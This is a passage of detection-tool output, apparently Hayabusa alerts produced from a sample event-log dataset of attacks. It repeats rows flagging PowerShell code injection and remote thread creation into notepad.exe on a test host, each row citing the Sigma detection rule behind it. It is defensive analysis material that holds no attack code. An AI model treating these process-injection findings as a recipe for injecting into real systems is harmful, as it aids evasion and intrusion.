Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.551 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.583 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.598 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.614 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.630 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.661 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.692 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.708 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.723 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.739 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.755 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.770 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.801 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.817 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.833 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.848 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.864 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.880 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.895 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.926 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.942 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.973 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
